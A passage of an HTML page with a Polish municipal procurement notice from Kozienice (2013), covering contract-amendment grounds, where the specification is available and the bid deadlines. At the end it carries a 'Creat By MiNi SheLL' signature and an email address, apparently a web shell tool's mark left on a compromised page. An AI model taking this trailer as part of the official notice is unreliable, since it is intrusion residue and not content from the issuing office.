2) w przypadku zaistnienia potrzeby zmiany rozwiązań technicznych, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie od zaproponowanego w projekcie,
3) gdy wystąpiły takie okoliczności, których nie można było przewidzieć w chwili zawarcia umowy i na które strony nie miały wpływu,
4) w przypadku zaistnienia uzasadnionej potrzeby zmiany kierownika budowy lub podwykonawcy. 
Jeżeli Wykonawca w celu potwierdzenia spełnienia warunków udziału w postępowaniu posługiwał się zasobami dotychczasowego podwykonawcy lub kierownika budowy, zmiana podwykonawcy możliwa jest po przedłożeniu przez Wykonawcę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu przez zaproponowanego podwykonawcę lub kierownika budowy,
5) gdy nastąpi zmiana stawki podatku VAT przez władzę ustawodawczą w trakcie trwania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego.
6) gdy nastąpi zmiana przepisów prawnych mających wpływ na realizację umowy, w szczególności na jej zakres, termin,
7)gdy nastąpi zmiana formy organizacyjno - prawnej lub siedziby Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozienice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice, pok.111 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com